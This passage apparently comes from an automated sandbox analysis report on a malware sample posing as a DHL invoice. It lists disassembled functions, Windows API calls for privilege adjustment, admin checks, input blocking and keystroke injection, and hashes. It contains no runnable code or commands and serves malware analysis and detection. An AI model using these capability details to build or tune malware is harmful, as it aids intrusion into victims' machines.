                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1682464887-0
                                                                                                                        • Opcode ID: b26487d99dd36895851bc88b150e1fcc3991f02425174918f05972149d0b4fff
                                                                                                                        • Instruction ID: 75f928f6152a403f2a0f7bc0adb3b284f1713daeb9fd204a3edb79d4b338f7c0
                                                                                                                        • Opcode Fuzzy Hash: b26487d99dd36895851bc88b150e1fcc3991f02425174918f05972149d0b4fff
                                                                                                                        • Instruction Fuzzy Hash: 82315A75A10508DFDB01DF54D884EADBBB4FF49314F088499E809AB362CB31E846CB90
                                                                                                                        Function 003916C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0034FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00350668
                                                                                                                          • Part of subcall function 0034FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00350685
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039170D
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0039173A
                                                                                                                        • GetLastError.KERNEL32 ref: 0039174A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 577356006-0
                                                                                                                        • Opcode ID: 41cebfae6608598bfba9d0ba5752a5daa6102c6e16a95c97d255584d7dc9fe75
                                                                                                                        • Instruction ID: 0deebe9c8d881015b913e5af9d5a556d6a2b5e1de37ef15fb0c3845e0d429959
                                                                                                                        • Opcode Fuzzy Hash: 41cebfae6608598bfba9d0ba5752a5daa6102c6e16a95c97d255584d7dc9fe75
                                                                                                                        • Instruction Fuzzy Hash: FD11BFB2810205AFE7199F54EC86D6AB7FDEF04714B24852EE05696241EB70FC418B20
                                                                                                                        Function 0039D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0039D608
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0039D645
                                                                                                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0039D650
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 33631002-0
                                                                                                                        • Opcode ID: 984e11ebae04e20158526c3b3d46f0d6daddc902f3e85a6b54d4def1a4d62e1c
                                                                                                                        • Instruction ID: 79cfc0ec1a97c7d93ffd90e208e935751d77f3705b3b2d058903051104dd0bd1
                                                                                                                        • Opcode Fuzzy Hash: 984e11ebae04e20158526c3b3d46f0d6daddc902f3e85a6b54d4def1a4d62e1c
                                                                                                                        • Instruction Fuzzy Hash: A711A175E01228BFDB118F95EC45FAFBFBCEB45B50F108115F908E7290C2705A018BA1
                                                                                                                        Function 00391663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0039168C
                                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003916A1
                                                                                                                        • FreeSid.ADVAPI32(?), ref: 003916B1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3429775523-0
                                                                                                                        • Opcode ID: 2e41b33a641486af0e3d3d6bcc38b73e1f903bb5e3c5962d8f3835959a37bb92
                                                                                                                        • Instruction ID: 4ba5c7f60f2a58d293f6a71a2878d68bf2faafe9ea32e2bf6cb027b93f617523
                                                                                                                        • Opcode Fuzzy Hash: 2e41b33a641486af0e3d3d6bcc38b73e1f903bb5e3c5962d8f3835959a37bb92
                                                                                                                        • Instruction Fuzzy Hash: D4F0F4B1950309FBDF01DFE49C89EAEBBBCFB08704F504565E901E2181E774EA448B54
                                                                                                                        Function 00354CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(003628E9,?,00354CBE,003628E9,003F88B8,0000000C,00354E15,003628E9,00000002,00000000,?,003628E9), ref: 00354D09
                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00354CBE,003628E9,003F88B8,0000000C,00354E15,003628E9,00000002,00000000,?,003628E9), ref: 00354D10
                                                                                                                        • ExitProcess.KERNEL32 ref: 00354D22
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1703294689-0
                                                                                                                        • Opcode ID: e59e2c50860c224cd867c0f92e482a666c24c48e702f37a6363ca17f5db2ee5f
                                                                                                                        • Instruction ID: 0765d98dee9a788d01b1a8da1390804827760c0da87ace476efdf78f757a6b39
                                                                                                                        • Opcode Fuzzy Hash: e59e2c50860c224cd867c0f92e482a666c24c48e702f37a6363ca17f5db2ee5f
                                                                                                                        • Instruction Fuzzy Hash: DFE09231410188ABCB16AF54EE09E583BA9AB41786F159018FC098B133CB3AE986CB90
                                                                                                                        Function 0036C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: /
                                                                                                                        • API String ID: 0-2043925204
                                                                                                                        • Opcode ID: aad2d7cdedc2058f7affeede67c4e62502cf105445713f730075560273c1c41a
                                                                                                                        • Instruction ID: cb6919c20c520b5182a3ac5e288743cb954d780f89be4fd0a97b8e03b52f82ab
                                                                                                                        • Opcode Fuzzy Hash: aad2d7cdedc2058f7affeede67c4e62502cf105445713f730075560273c1c41a
                                                                                                                        • Instruction Fuzzy Hash: F64149769002196FCB21DFB9CC5CDBB7778EB84314F208669F945CB284E6709D41CB50
                                                                                                                        Function 0038D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 0038D28C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: NameUser
                                                                                                                        • String ID: X64
                                                                                                                        • API String ID: 2645101109-893830106
                                                                                                                        • Opcode ID: 86eba263fb376722b1e9f2a3a6828ea27b0ce143c6e5556056b2fbbb0894293b
                                                                                                                        • Instruction ID: 363d56b22d780909813bd55e568af4b2faaecc502cdb76d6a3c820b3b231020f
                                                                                                                        • Opcode Fuzzy Hash: 86eba263fb376722b1e9f2a3a6828ea27b0ce143c6e5556056b2fbbb0894293b
                                                                                                                        • Instruction Fuzzy Hash: 8ED0C9B481112DEACB91DB90EC88DD9B3BCBB04305F100591F106E2440D730A5488F10
                                                                                                                        Function 0035CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                        • Instruction ID: f76c324b289243f8693f42b04ab4b297a4ecee824b769ca2411fc15330637f63
                                                                                                                        • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                        • Instruction Fuzzy Hash: F2022C71E102199FDF15CFA9C880AADFBF1EF48319F259169D819EB390D731AA45CB80
                                                                                                                        Function 0033CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Variable is not of type 'Object'.$p#@
                                                                                                                        • API String ID: 0-655357629
                                                                                                                        • Opcode ID: 80e33b9ab4e10a29c21604e75621f520cdf1e5b804335a7ef7220570b09f4fda
                                                                                                                        • Instruction ID: de056fd003c6b108c66c28cd131e343256a9a302ac1dea53186fc0103097868c
                                                                                                                        • Opcode Fuzzy Hash: 80e33b9ab4e10a29c21604e75621f520cdf1e5b804335a7ef7220570b09f4fda
                                                                                                                        • Instruction Fuzzy Hash: 1532AE34910218DBCF1AEF90C9C1AEDB7B9BF05304F1550A9E806BF292D775AE49CB50
                                                                                                                        Function 003A68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 003A6918
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 003A6961
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2295610775-0
                                                                                                                        • Opcode ID: 4c2ddd1b6423d6a46ac7d4afdd1ed68ea5c801242453ba065ef2a9f94e2d715b
                                                                                                                        • Instruction ID: 2e1a02ba322a66087af522935cace89899ae4c91850f513adfc575a51bf61fab
                                                                                                                        • Opcode Fuzzy Hash: 4c2ddd1b6423d6a46ac7d4afdd1ed68ea5c801242453ba065ef2a9f94e2d715b
                                                                                                                        • Instruction Fuzzy Hash: 7311D0356142009FC711CF29C4C9A16BBE4FF89328F09C69DE4698F6A2CB30EC05CB90
                                                                                                                        Function 003A37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,003B4891,?,?,00000035,?), ref: 003A37E4
                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,003B4891,?,?,00000035,?), ref: 003A37F4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3479602957-0
                                                                                                                        • Opcode ID: 1cc43e238fce0cbd9975b9465255a25540994e0cccb793747070d5bc6c6bf202
                                                                                                                        • Instruction ID: 15bcf667a97e9d6ffcfa69f812351a6d6ddffe552c7bf640785b202ce22031f9
                                                                                                                        • Opcode Fuzzy Hash: 1cc43e238fce0cbd9975b9465255a25540994e0cccb793747070d5bc6c6bf202
                                                                                                                        • Instruction Fuzzy Hash: 4DF0E5B16053286AEB2257669C4DFEB3AAEEFC5761F000265F509D2281D9A09904C7B0
                                                                                                                        Function 0039B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0039B25D
                                                                                                                        • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0039B270
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3536248340-0
                                                                                                                        • Opcode ID: 7b2976840c5976b8cd3bb0e60f15c41a1f44b51e558dc0bcb9409b9e239ad7da
                                                                                                                        • Instruction ID: d03bd8d88810756b560ab416273272ea8ed65d5895f6c44b29fd36be6072136f
                                                                                                                        • Opcode Fuzzy Hash: 7b2976840c5976b8cd3bb0e60f15c41a1f44b51e558dc0bcb9409b9e239ad7da
                                                                                                                        • Instruction Fuzzy Hash: 73F06D7080424DABDF069FA0C805BAEBBB4FF04305F00840AF955E5192C37992019F94
                                                                                                                        Function 003910BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003911FC), ref: 003910D4
                                                                                                                        • CloseHandle.KERNEL32(?,?,003911FC), ref: 003910E9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 81990902-0
                                                                                                                        • Opcode ID: fb3b2fd9df45638ca5efdff4ec11cd5b418d52267527353e506fdbd5644ba3eb
                                                                                                                        • Instruction ID: 88e9f763a27dc47ace0d1d6b0b452fb8d537e97a478c1ff1737e332bb70e5eca
                                                                                                                        • Opcode Fuzzy Hash: fb3b2fd9df45638ca5efdff4ec11cd5b418d52267527353e506fdbd5644ba3eb
                                                                                                                        • Instruction Fuzzy Hash: 7AE0BF72014651AEE7262B51FC05E7777EDFB04311F14882DF5A6844B5DB62BC90DB50
                                                                                                                        Function 0036676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00366766,?,?,00000008,?,?,0036FEFE,00000000), ref: 00366998
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3997070919-0
                                                                                                                        • Opcode ID: 5b6a1589b80ec558d59c3fe25b0cdd221120a2112f4893ef341921830b32eaa3
                                                                                                                        • Instruction ID: d7ed77ba6054bb5d523508c280ce8799470c110edab6bdb84e16fb58a09c3699
                                                                                                                        • Opcode Fuzzy Hash: 5b6a1589b80ec558d59c3fe25b0cdd221120a2112f4893ef341921830b32eaa3
                                                                                                                        • Instruction Fuzzy Hash: DAB13A716106089FD716CF28C48AB657BE0FF453A4F2AC65CE899CF2A6C335E991CB40
                                                                                                                        Function 0034B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        • Opcode ID: 91a2cac8dc4da12abc6023437480da3687d9d64314569f624b018ad9a39e2a4a
                                                                                                                        • Instruction ID: 21f3bb1cb53c90364f522f1f1585a802f9efaf1e54ae6137473967c12c668fc0
                                                                                                                        • Opcode Fuzzy Hash: 91a2cac8dc4da12abc6023437480da3687d9d64314569f624b018ad9a39e2a4a
                                                                                                                        • Instruction Fuzzy Hash: 67126E759002299FCB26DF59C880AEEB7F5FF48310F55819AE849EB251DB709E81CF90
                                                                                                                        Function 003AEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • BlockInput.USER32(00000001), ref: 003AEABD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BlockInput
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3456056419-0
                                                                                                                        • Opcode ID: 94c4fddd41e4fd3c6d9e8af8e0175542941e9220c4715b5238f79e0e7ffe22e8
                                                                                                                        • Instruction ID: d473bd03eb43609c711225ce92a3f5e91156f8c4a38fb40925a843746b9f566c
                                                                                                                        • Opcode Fuzzy Hash: 94c4fddd41e4fd3c6d9e8af8e0175542941e9220c4715b5238f79e0e7ffe22e8
